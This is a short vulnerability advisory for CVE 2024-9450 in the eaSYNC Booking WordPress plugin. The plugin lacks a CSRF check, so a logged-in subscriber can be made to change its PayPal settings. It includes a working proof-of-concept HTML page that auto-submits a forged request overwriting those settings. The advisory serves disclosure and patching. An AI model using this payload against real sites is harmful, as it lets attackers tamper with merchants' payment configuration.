Free Booking Plugin for Hotels, Restaurants and Car Rentals – eaSYNC Booking < 1.3.15 – Subscriber+ PayPal Settings Update | CVE 2024-9450

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in subscriber change them via a CSRF attack

Proof of Concept

As a subscriber, open the following HTML file:

```
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://localhost:10008/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="sync_paypal_sandbox" value="hacked" />
      <input type="hidden" name="sync_paypal_production" value="hacked" />
      <input type="hidden" name="sync_paypal_use" value="sandbox" />
      <input type="hidden" name="type" value="option_paypal_set" />
      <input type="hidden" name="action" value="easync_setting_save" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
```

See that the PayPal settings have been updated when logging in as an admin.